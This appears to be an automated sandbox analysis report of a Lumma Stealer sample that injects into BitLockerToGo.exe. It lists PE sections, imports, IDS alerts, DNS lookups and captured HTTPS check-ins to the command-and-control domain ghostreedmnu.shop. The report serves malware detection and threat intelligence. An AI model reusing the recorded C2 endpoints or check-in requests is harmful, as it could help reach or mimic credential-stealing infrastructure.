.text	0x1000	0x298af8	0x298c00	edaf3fe168b511f37226e95577a27c8c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x29a000	0x2d20d8	0x2d2200	7ec806571a4047505f161c64450814aa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x56d000	0x691e0	0x3ca00	dde7c772e64f329318feec6fb23f5a0b	False	0.4347092461340206	data	5.46067485792233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5d7000	0x44c	0x600	bc644d9ac45360d41f4ab376731549d4	False	0.3561197916666667	OpenPGP Public Key	3.8114448049638896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x5d8000	0x21710	0x21800	6bc3bb3e09a939d50a6067ddda79d247	False	0.5973355876865671	data	6.632574778374915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x5fa000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x5fb000	0xe8f4	0xea00	573a4ee193a3e93154f8c5c17e77be20	False	0.16474692841880342	data	3.49918469227147	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x5fb384	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0x5fbdec	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0x5fc454	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0x5fc73c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0x5fc864	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0x5fde8c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0x5fed34	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0x5ff5dc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0x5ffb44	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0x600e2c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0x605054	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0x6075fc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0x6086a4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_GROUP_ICON	0x608b0c	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0x608bc8	0x584	data	English	United States	0.27407932011331443
RT_MANIFEST	0x60914c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-29T00:54:39.440733+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.4	63449	1.1.1.1	53	UDP
2024-09-29T00:54:39.954460+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.4	49730	188.114.96.3	443	TCP
2024-09-29T00:54:40.171987+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	188.114.96.3	443	TCP
2024-09-29T00:54:40.171987+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	188.114.96.3	443	TCP
2024-09-29T00:54:40.756569+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.4	49731	188.114.96.3	443	TCP
2024-09-29T00:54:41.176352+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	188.114.96.3	443	TCP
2024-09-29T00:54:41.176352+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 00:54:39.462578058 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:39.462622881 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:39.462712049 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:39.489722013 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:39.489742041 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:39.954392910 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:39.954459906 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:39.958854914 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:39.958867073 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:39.959182024 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.000621080 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.067584038 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.067600965 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.067724943 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.172005892 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.172045946 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.172070980 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.172089100 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.172137976 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.172153950 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.172167063 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.172167063 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.172216892 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.189618111 CEST	49730	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.189632893 CEST	443	49730	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.290327072 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.290385008 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.290467978 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.290757895 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.290776968 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.756480932 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.756568909 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.757936954 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.757973909 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.758227110 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:40.759952068 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.759999037 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:40.760052919 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:41.176352024 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:41.176434040 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:41.176548004 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:41.176750898 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:41.176774979 CEST	443	49731	188.114.96.3	192.168.2.4
Sep 29, 2024 00:54:41.176790953 CEST	49731	443	192.168.2.4	188.114.96.3
Sep 29, 2024 00:54:41.176799059 CEST	443	49731	188.114.96.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 00:54:39.440732956 CEST	63449	53	192.168.2.4	1.1.1.1
Sep 29, 2024 00:54:39.452074051 CEST	53	63449	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 29, 2024 00:54:39.440732956 CEST	192.168.2.4	1.1.1.1	0xd4f6	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 29, 2024 00:54:39.452074051 CEST	1.1.1.1	192.168.2.4	0xd4f6	No error (0)	ghostreedmnu.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 29, 2024 00:54:39.452074051 CEST	1.1.1.1	192.168.2.4	0xd4f6	No error (0)	ghostreedmnu.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ghostreedmnu.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.3	443	7500	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 22:54:40 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-28 22:54:40 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-28 22:54:40 UTC	557	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 22:54:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OC%2BIN1KXkbc2GyQkzkaaiCAIM4uwyd%2BUHWghEZdvBf4RFHA9SLRNWFg8gxoXN4NkkCtWRYTqik0ZWfdcPg4oqwbWZj%2BvzRjL2R5xeSj10VSCYxQWl%2B7UsV2ulH34sCNJQUPg%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca7510cbd447cae-EWR
2024-09-28 22:54:40 UTC	812	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-28 22:54:40 UTC	1369	IN	Data Raw: 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 Data Ascii: tyles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById
2024-09-28 22:54:40 UTC	1369	IN	Data Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6d 52 32 4a 53 4e 61 52 64 44 6a 45 5f 38 58 4e 72 4b 6c 6c 4a 6a 38 38 44 6e 71 79 44 34 50 44 6d 41 6c 72 5a 73 77 78 6a 58 51 2d 31 37 32 37 35 36 34 30 38 30 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 Data Ascii: > <input type="hidden" name="atok" value="mR2JSNaRdDjE_8XNrKllJj88DnqyD4PDmAlrZswxjXQ-1727564080-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-b
2024-09-28 22:54:40 UTC	855	IN	Data Raw: 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c Data Ascii: ator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfl
2024-09-28 22:54:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	188.114.96.3	443	7500	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-28 22:54:40 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=mR2JSNaRdDjE_8XNrKllJj88DnqyD4PDmAlrZswxjXQ-1727564080-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: ghostreedmnu.shop
2024-09-28 22:54:40 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 39 6d 6b 57 6c 68 2d 2d 52 61 55 46 50 50 50 70 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=9mkWlh--RaUFPPPp&j=
2024-09-28 22:54:41 UTC	778	IN	HTTP/1.1 200 OK Date: Sat, 28 Sep 2024 22:54:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kmhpl6rslnknsp2gm0nvaqjsq2; expires=Wed, 22 Jan 2025 16:41:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9iWv8tW%2BGdgM29xr8z7jQl71%2B7MdHGtiaV5E8LDBGMITvOxzpzsU6eV4UYzFeYNVRyCseMW%2Fd1HeZmlX0GYePFeFZ5Mwp0hidy8fVvjIRczeTa8rr%2FJ2ZzOZQuJ%2BD9ka0C3oA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ca751113cc5c324-EWR
2024-09-28 22:54:41 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-28 22:54:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	18:54:24
Start date:	28/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x650000
File size:	6'129'152 bytes
MD5 hash:	447DE2327DC8ECD4830023A7D6C8ED64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1845237466.0000000001546000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1845237466.0000000001680000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:54:34
Start date:	28/09/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xf80000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25.9%
Total number of Nodes:	201
Total number of Limit Nodes:	23

Executed Functions

Function 006F1DAE Relevance: 41.5, APIs: 4, Strings: 19, Instructions: 1276COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 006F1DC0
CoUninitialize.OLE32 ref: 006F20A9
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 006F20C1

Strings

?&%, xrefs: 006F249C
\^, xrefs: 006F260B
U, xrefs: 006F2995
4`[b, xrefs: 006F2BBE
h], xrefs: 006F299C
6K;I, xrefs: 006F1F9D
b,o, xrefs: 006F2C50
l/=-, xrefs: 006F2674
(S)Q, xrefs: 006F1FC7
'[(Y, xrefs: 006F1FB9
1<$, xrefs: 006F248E
:+*), xrefs: 006F267B
W?O=, xrefs: 006F1F7A
A87356CF577DB7E665542B118A15FDA8, xrefs: 006F1DD0
ghostreedmnu.shop, xrefs: 006F2070, 006F2724
/^, xrefs: 006F2604
_[, xrefs: 006F2612
%W'U, xrefs: 006F1FC0
[n, xrefs: 006F2619

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: DirectoryInitializeSecuritySystemUninitialize
String ID: %W'U$'[(Y$(S)Q$/^$1<$$4`[b$6K;I$:+*)$?&%$A87356CF577DB7E665542B118A15FDA8$U$W?O=$[n$\^$_[$b,o$ghostreedmnu.shop$h]$l/=-
API String ID: 1555113959-708685997
Opcode ID: c7994c93317f5f3c5718ade7f0c934496b0bba90f6bfbc546383a891bc9229f7
Instruction ID: 41642fba4abaffd7b597faf156ebe4a1571e255c19a365d2c5310dc9cf05cdfe
Opcode Fuzzy Hash: c7994c93317f5f3c5718ade7f0c934496b0bba90f6bfbc546383a891bc9229f7
Instruction Fuzzy Hash: 9292AAB4500381CFD3259F25D890A2ABBF2FF5A304F24499CE5868B352D736E846CF95

Function 006EF870 Relevance: 32.6, Strings: 25, Instructions: 1361COMMON

Download Yara Rule

Strings

#]-_, xrefs: 006EF9B2
|MnO, xrefs: 006EF996
QaRc, xrefs: 006EF9C7
A{y, xrefs: 006F0E00
%EqG, xrefs: 006EF988
L9N;, xrefs: 006EF981
\S, xrefs: 006F0D0C
m%o, xrefs: 006F0083
Zm^o, xrefs: 006EF9CE
8eFg, xrefs: 006EF9C0
vK, xrefs: 006F01A0
F=W?, xrefs: 006EF97A
IC, xrefs: 006F03A4
A{y, xrefs: 006F0C6F, 006F0C88, 006F0C80, 006F0C8C
$#, xrefs: 006F0A9C
A{y, xrefs: 006F0BF6, 006F0BD3, 006F0D56, 006F0D33, 006F0BDB, 006F0D3B
e1E3, xrefs: 006EF973
sq, xrefs: 006F0CCC
*e*g, xrefs: 006F0091
SiJk, xrefs: 006EF9D5
_O, xrefs: 006F0196
KM, xrefs: 006F03B2
ghostreedmnu.shop, xrefs: 006F09A3, 006F09B8
}AtC, xrefs: 006EF98F
q<s, xrefs: 006F007C

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: m%o$#]-_$$#$%EqG$*e*g$8eFg$A{y$A{y$A{y$F=W?$IC$KM$L9N;$QaRc$SiJk$Zm^o$\S$_O$e1E3$ghostreedmnu.shop$vK$|MnO$}AtC$q<s$sq
API String ID: 0-4068501341
Opcode ID: a668d993ca120abb5d56ff947ba83a3b005669361c53443ee31d87ea0d6e86c5
Instruction ID: 53fdb5db7d2118afa0334d421b05d464d79a6397d485f3a5baec4994bfc1f18c
Opcode Fuzzy Hash: a668d993ca120abb5d56ff947ba83a3b005669361c53443ee31d87ea0d6e86c5
Instruction Fuzzy Hash: 85B2A7B0504705DFE7208F65D881B6BBBF6FF49301F10892CE59A9B6A1D738E841CBA5

Function 006EE9C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(9FF799E3,00000000,8!67), ref: 006EEACD

Strings

8!67, xrefs: 006EEA33, 006EEA3B

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad
String ID: 8!67
API String ID: 1029625771-485824511
Opcode ID: 56f7a1924f3ca6bff061acf7bd2d99437913aff172c16c1e54d693f3c4b7ac94
Instruction ID: 81d666ad0023c400ce93922999e812ffc74c4f470ff80639398a61b56a79c135
Opcode Fuzzy Hash: 56f7a1924f3ca6bff061acf7bd2d99437913aff172c16c1e54d693f3c4b7ac94
Instruction Fuzzy Hash: 3551ADF0D11348EFEB10AFA4FC469ADBF71EB05346F504029F804B7265D73A4A558BA5

Function 0071EB20 Relevance: 3.1, APIs: 2, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1856595095.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000001.00000002.1856573819.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856676925.000000000072B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856699928.000000000072E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1856723853.000000000073D000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff94b72b710ade5368625f02855ea2d4978c95ba2f20df63b28deb4ed786346
